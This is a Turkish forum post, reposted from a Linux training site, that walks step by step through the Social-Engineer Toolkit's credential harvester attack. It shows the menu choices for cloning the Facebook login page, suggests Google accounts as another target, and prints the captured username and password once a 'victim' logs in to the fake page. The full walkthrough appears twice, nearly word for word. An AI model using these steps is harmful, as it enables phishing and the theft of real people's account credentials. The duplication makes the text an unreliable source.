Merhaba arkadaşlar bugün bir yerden bulduğum makaleyi sizinle paylaşayım dedim bu yazım hergangi bir forumdan alıntı değil başka bir linux üzerine eğitimi veren siteden alınmıştır.
Bilmeyenler için faydalı olacağını düşündüm ve forumumuzda yer alsın dedim uzatmadan anlatıma geçelim.
Social Enginering Toolkit(SET) başlatıyoruz.
1.root@root:~# cd /pentest/exploits/set
root@root:/pentest/exploits/set# ./set
2. set > 2
3.set:webattack > 3
4.webattack > 2
5.set:webattack > kopyalamak istediğiniz site: https://www.facebook.com (Sizler başka siteler ekleyebilirsiniz.Ör:https://accounts.google.com) yazıp enter.
şöyle bir yazı çıkacaktır:[*] Cloning the website: https://login.facebook.com/login.php[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.[*] I have read the above message.[*]
Press {return} to continue. (enter tuşuna basın)
enter dedikten sonra şu yazı çıkacaktır.
[*] Social-Engineer Toolkit Credential Harvester Attack[*] Credential Harvester is running on port 80[*] Information will be displayed to you as it arrives below:
Bu bölümde kurbanın oluşturduğumuz sahte adresimizi ziyaret etmesini bekliyoruz.Eğer adresimizi ziyaret eder ve login bilgilerini girerse kullanıcı adı ve parola ekrana yazdırılacaktır.
3.Adım:Şimdi oluşturduğumuz sahte adresi(http://172.16.244.128/) ziyaret edelim ve login olmaya çalışalım.
4.Adım:Gerçekleşen login girişimlerini ekranda görebilirsiniz.[*] WE GOT A HIT! Printing the output:
PARAM: lsd=AVoZd6kS
PARAM: display=
PARAM: enable_profile_selector=
PARAM: legacy_return=1
PARAM: profile_selector_ids=
PARAM: trynum=1
PARAM: timezone=-120
PARAM: lgnrnd=081425_7Wct
PARAM: lgnjs=1420734563
POSSIBLE USERNAME FIELD FOUND: email=etik.backtrack
POSSIBLE PASSWORD FIELD FOUND: pass=etikbacktrack1453@
Oluşturduğunuz sahte web sitesinin adresini öğrenmek için terminalde "ifconfig" komutunu yazdırabilirsiniz.
Bilmeyenler için faydalı olacağını düşündüm ve forumumuzda yer alsın dedim uzatmadan anlatıma geçelim.
Social Enginering Toolkit(SET) başlatıyoruz.
1.root@root:~# cd /pentest/exploits/set
root@root:/pentest/exploits/set# ./set
2. set > 2
3.set:webattack > 3
4.webattack > 2
5.set:webattack > kopyalamak istediğiniz site: https://www.facebook.com (Sizler başka siteler ekleyebilirsiniz.Ör:https://accounts.google.com) yazıp enter.
şöyle bir yazı çıkacaktır:[*] Cloning the website: https://login.facebook.com/login.php[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.[*] I have read the above message.[*]
Press {return} to continue. (enter tuşuna basın)
enter dedikten sonra şu yazı çıkacaktır.
[*] Social-Engineer Toolkit Credential Harvester Attack[*] Credential Harvester is running on port 80[*] Information will be displayed to you as it arrives below:
Bu bölümde kurbanın oluşturduğumuz sahte adresimizi ziyaret etmesini bekliyoruz.Eğer adresimizi ziyaret eder ve login bilgilerini girerse kullanıcı adı ve parola ekrana yazdırılacaktır.
3.Adım:Şimdi oluşturduğumuz sahte adresi(http://172.16.244.128/) ziyaret edelim ve login olmaya çalışalım.
4.Adım:Gerçekleşen login girişimlerini ekranda görebilirsiniz.[*] WE GOT A HIT! Printing the output:
PARAM: lsd=AVoZd6kS
PARAM: display=
PARAM: enable_profile_selector=
PARAM: legacy_return=1
PARAM: profile_selector_ids=
PARAM: trynum=1
PARAM: timezone=-120
PARAM: lgnrnd=081425_7Wct
PARAM: lgnjs=1420734563
POSSIBLE USERNAME FIELD FOUND: email=etik.backtrack
POSSIBLE PASSWORD FIELD FOUND: pass=etikbacktrack1453@
Oluşturduğunuz sahte web sitesinin adresini öğrenmek için terminalde "ifconfig" komutunu yazdırabilirsiniz.